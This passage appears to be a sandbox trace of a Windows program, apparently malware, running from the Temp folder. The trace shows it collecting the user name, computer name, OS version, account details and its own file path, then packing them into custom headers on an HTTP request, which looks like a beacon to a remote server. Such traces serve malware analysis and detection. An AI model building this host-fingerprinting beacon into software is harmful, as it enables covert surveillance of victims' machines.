	[0074.263] wsprintfW (in: param_1=0x31a40a0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0074.263] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0074.263] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0074.263] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x328f280, nSize=0x247f340 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x247f340) returned 0x1
	[0074.263] wsprintfW (in: param_1=0x31a40a0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0074.263] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0074.263] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0074.263] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x247f348 | out: phkResult=0x247f348*=0x688) returned 0x0
	[0074.263] RegQueryValueExW (in: hKey=0x688, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f320*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f320*=0x0) returned 0x2
	[0074.263] RegQueryValueExW (in: hKey=0x688, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f320*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f320*=0x0) returned 0x2
	[0074.263] RegQueryValueExW (in: hKey=0x688, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f320*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f320*=0x0) returned 0x2
	[0074.264] RegCloseKey (hKey=0x688) returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.264] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.265] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.266] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.267] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetLastError () returned 0x0
	[0074.268] GetComputerNameW (in: lpBuffer=0x328f8f8, nSize=0x247f484 | out: lpBuffer="X2VS1CUM", nSize=0x247f484) returned 1
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.268] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.269] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] GetLastError () returned 0xcb
	[0074.270] wsprintfW (in: param_1=0x31a40a0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0074.270] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0074.270] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0074.270] GetVersionExW (in: lpVersionInformation=0x247f368*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247f368*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.271] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.272] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] wsprintfW (in: param_1=0x31a40a0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0074.273] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0074.273] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.273] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] GetLastError () returned 0x0
	[0074.274] wsprintfW (in: param_1=0x31a40a0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 2816") returned 16
	[0074.274] lstrlenW (lpString="X-VendorId: 2816") returned 16
	[0074.274] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 2816", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0074.274] GetCurrentProcess () returned 0xffffffff
	[0074.274] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x247f348 | out: TokenHandle=0x247f348*=0x688) returned 1
	[0074.274] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x247f324 | out: TokenInformation=0x0, ReturnLength=0x247f324) returned 0
	[0074.274] GetLastError () returned 0x7a
	[0074.274] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x5433b8, TokenInformationLength=0x24, ReturnLength=0x247f324 | out: TokenInformation=0x5433b8, ReturnLength=0x247f324) returned 1
	[0074.274] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5433c0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x3286178, cchName=0x247f318, ReferencedDomainName=0x3285958, cchReferencedDomainName=0x247f318, peUse=0x247f30c | out: Name="Nd9E1FYi", cchName=0x247f318, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x247f318, peUse=0x247f30c) returned 1
	[0074.275] CloseHandle (hObject=0x688) returned 1
	[0074.275] CloseHandle (hObject=0xffffffff) returned 1
	[0074.275] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x247f348 | out: bufptr=0x5a3f38*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x18676fc, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x5a3fcf, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.278] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.279] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
